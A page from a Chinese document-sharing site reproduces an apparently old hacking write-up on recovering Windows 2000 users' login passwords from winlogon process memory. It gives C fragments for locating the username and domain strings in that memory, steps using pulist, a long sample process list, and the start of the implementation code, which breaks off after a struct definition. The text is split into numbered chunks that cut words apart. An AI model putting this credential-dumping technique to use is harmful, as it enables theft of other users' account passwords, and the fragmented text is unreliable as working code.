获取windows登陆账户密码

《获取windows登陆账户密码》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、WindowsLogonProcess，WindowsNT用户登陆程序，管理用户登录和退出。因为登陆的域名和用户名是明文存储在winlogon进程里的，而Password是限定了查找本进程用户的密码<167-174：  GetEnvironmentVariableW(L"USERNAME",UserName,0x400);  GetEnvironmentVariableW(L"USERDOMAIN",UserDomain,0x400);>，然后到winlogon进程的空间中查找UserDomain和UserName<590://在WinLogon的内存空间中寻找UserName和Dom

2、ainName的字符串if((wcscmp((wchar_t*)RealStartingAddressP,UserName)==0)&&(wcscmp((wchar_t*)((DWORD)RealStartingAddressP+USER_DOMAIN_OFFSET_WIN2K),UserDomain)==0))>，找到后就查后边的加密口令。其实只要你自己指定用户名和winlogon进程去查找就行了，只要你是管理员，任何本机用msgina.dll图形登陆的用户口令都可以找到。1.pulist，找到系统里登陆的域名和用户名，及winlogon进程id2.然后给每个winlogon进程id

3、查找指定的用户就行了。example:C:DocumentsandSettingsbingle>pulistProcess     PID UserIdle       0System      8smss.exe     164 NTAUTHORITYSYSTEMcsrss.exe    192 NTAUTHORITYSYSTEMwinlogon.exe   188 NTAUTHORITYSYSTEMwins.exe     1212NTAUTHORITYSYSTEMExplorer.exe   388 TEST-2KSERVERAdministratorinternat.exe  

4、 1828TEST-2KSERVERAdministratorconime.exe    1868TEST-2KSERVERAdministratormsiexec.exe   1904NTAUTHORITYSYSTEMtlntsvr.exe   1048NTAUTHORITYSYSTEMtaskmgr.exe   1752TEST-2KSERVERAdministratorcsrss.exe    2056NTAUTHORITYSYSTEMwinlogon.exe   2416NTAUTHORITYSYSTEMrdpclip.exe   2448TEST-2KSERVERclovea

5、Explorer.exe   2408TEST-2KSERVERcloveainternat.exe   1480TEST-2KSERVERcloveacmd.exe     2508TEST-2KSERVERAdministratorntshell.exe   368 TEST-2KSERVERAdministratorntshell.exe   1548TEST-2KSERVERAdministratorntshell.exe   1504TEST-2KSERVERAdministratorcsrss.exe    1088NTAUTHORITYSYSTEMwinlogon.exe

6、   1876NTAUTHORITYSYSTEMrdpclip.exe   1680TEST-2KSERVERbingleExplorer.exe   2244TEST-2KSERVERbingleconime.exe    2288TEST-2KSERVERbingleinternat.exe   1592TEST-2KSERVERbinglecmd.exe     1692TEST-2KSERVERbinglemdm.exe     2476TEST-2KSERVERbingletaskmgr.exe   752 TEST-2KSERVERbinglepulist.exe    2

7、532TEST-2KSERVERbingle具体实现代码如下双击代码全选#include     #include     #include     #include               typedefstruct_UNICODE_STRING     {         USHORTLength;         USHORTMaximumLength;